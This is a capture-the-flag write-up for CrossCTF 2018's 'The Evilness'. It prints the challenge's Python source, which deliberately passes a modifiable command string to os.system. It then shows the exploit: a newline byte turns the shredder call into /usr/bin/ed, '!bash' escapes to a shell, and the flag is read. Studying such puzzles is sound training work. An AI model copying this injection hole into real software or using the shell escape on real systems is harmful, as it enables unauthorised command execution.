CrossCTF_2018: The Evilness 195

Category: Misc Points: 195 Description:

Ready for something ridiculously difficult? nc ctf.pwn.sg 4020

Write-up

Disclaimer, this was really easy. Firstly, we are given the source code of the program,

#!/usr/bin/env python

import sys
import flag
import signal
import os
import tempfile

temp_file = tempfile.NamedTemporaryFile(prefix="cartoon-",
                                        suffix=".dat",
                                        delete=True)


def handler(signum, frame):
    write("Times up!")
    temp_file.close()
    sys.exit(0)


def write(data, endl='\n'):
    sys.stdout.write(data + endl)
    sys.stdout.flush()


def readline():
    return sys.stdin.readline().strip()


def main():
    abspath = os.path.abspath(__file__)
    dname = os.path.dirname(abspath)
    os.chdir(dname)
    signal.signal(signal.SIGALRM, handler)
    signal.alarm(10)

    # Write the flag to the temp file
    temp_file.file.write(flag.flag)
    temp_file.file.flush()

    # Oh I'm sorry, did you want this?
    del flag.flag

    write(open(__file__).read())

    command = "/usr/bin/shred " + temp_file.name
    write("Here comes the shredder! (%s)" % command)

    ######################################################################
    #
    # INCOMING TRANSMISSION...
    #
    # CAREFUL AGENT. WE DO NOT HAVE MUCH TIME. I'VE OPENED A WORMHOLE IN
    # THE FABRIC OF TIME AND SPACE TO INTRODUCE A FAULT IN ONE BYTE!
    #
    # MAKE USE OF IT WISELY!
    #
    command_fault = list(command)
    index = int(readline())
    byt = int(readline(), 16)
    if (0x0 <= index < len(command_fault)):
        if (0x0 <= byt <= 0xff):
            command_fault[index] = chr(byt)
            command = "".join(command_fault)
    #
    # TRANSMISSION ENDED
    #
    ######################################################################

    # Oooh, did you want this too? Too bad it's being... shredded.
    os.system(command)


if __name__ == "__main__":
    main()

Well, how hard could it be? Well, for a sophiscated Linux user such as myself cough, there's always ed. By that, I mean /usr/bin/ed of course! To solve this challenge, simply replace the 11th character, r with a newline 0xa and escalate from the ed command into a fully featured shell!

Here comes the shredder! (/usr/bin/shred /tmp/cartoon-uboByD.dat)
11
a
sh: 1: /usr/bin/sh: not found
Newline appended
62
!bash
ls
flag
flag.py
requirements.txt
theevilness.py
cat flag
CrossCTF{it5_th3_r34ln3ss_th3_r3alness}

Therefore, the flag is CrossCTF{it5_th3_r34ln3ss_th3_r3alness}.

results matching ""

    No results matching ""